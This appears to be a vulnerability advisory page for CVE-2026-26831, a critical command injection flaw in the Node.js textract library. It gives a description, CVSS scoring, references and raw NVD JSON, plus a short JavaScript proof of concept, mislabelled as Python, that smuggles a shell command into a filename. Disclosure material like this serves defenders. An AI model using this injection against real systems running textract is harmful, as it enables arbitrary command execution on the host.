CVE-2026-26831

Description

textract through 2.5.0 is vulnerable to OS Command Injection via the file path parameter in multiple extractors. When processing files with malicious filenames, the filePath is passed directly to child_process.exec() in lib/extractors/doc.js, rtf.js, dxf.js, images.js, and lib/util.js with inadequate sanitization

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dbashford:textract:*:*:*:*:*:node.js:*:* - VULNERABLE

textract <= 2.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const textract = require('textract');
const path = require('path');

// Payload: Create a file named with a command injection payload
// The payload attempts to execute 'touch /tmp/pwned' using a semicolon
const maliciousFileName = "test.txt; touch /tmp/pwned; #";
const filePath = "/tmp/" + maliciousFileName;

// Simulate the vulnerable extraction process
// In a real scenario, the file might exist or the check might pass before exec
console.log(`[+] Attempting to extract from: ${filePath}`);

// Trigger the vulnerability in textract <= 2.5.0
// This will call child_process.exec() internally with the unsanitized path
textract.fromFileWithPath(filePath, function(error, text) {
    if (error) {
        console.log("[-] Error returned (may be expected if file missing, but command might have executed):", error.message);
    } else {
        console.log("[+] Extraction result:", text);
    }
    
    console.log("[+] Check /tmp/pwned to verify if the command was executed.");
});

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-26831
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-26831
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-26831/
[4] VulDB https://vuldb.com/cve/CVE-2026-26831
[5] https://github.com/dbashford/textract
[6] https://github.com/dbashford/textract/blob/master/lib/extractors/doc.js
[7] https://github.com/dbashford/textract/blob/master/lib/extractors/rtf.js
[8] https://github.com/dbashford/textract/blob/master/lib/util.js
[9] https://github.com/zebbernCVE/CVE-2026-26831
[10] https://www.npmjs.com/package/textract

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-26831", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:21.123", "lastModified": "2026-03-30T13:33:41.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "textract through 2.5.0 is vulnerable to OS Command Injection via the file path parameter in multiple extractors. When processing files with malicious filenames, the filePath is passed directly to child_process.exec() in lib/extractors/doc.js, rtf.js, dxf.js, images.js, and lib/util.js with inadequate sanitization"}, {"lang": "es", "value": "textract hasta la versión 2.5.0 es vulnerable a la Inyección de Comandos del Sistema Operativo a través del parámetro de ruta de archivo en múltiples extractores. Al procesar archivos con nombres de archivo maliciosos, la ruta de archivo (filePath) se pasa directamente a child_process.exec() en lib/extractors/doc.js, rtf.js, dxf.js, images.js y lib/util.js con una sanitización inadecuada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dbashford:textract:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "2.5.0", "matchCriteriaId": "9DD5E682-185B-4FC0-AA02-650FC0C89BA1"}]}]}], "references": [{"url": "https://github.com/dbashford/textract", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/dbashford/textract/blob/master/lib/extractors/doc.js", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/dbashford/textract/blob/master/lib/extractors/rtf.js", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/dbashford/textract/blob/master/lib/util.js", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/zebbernCVE/CVE-2026-26831", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.npmjs.com/package/textract", "source": "[email protected]", "tags": ["Product"]}]}}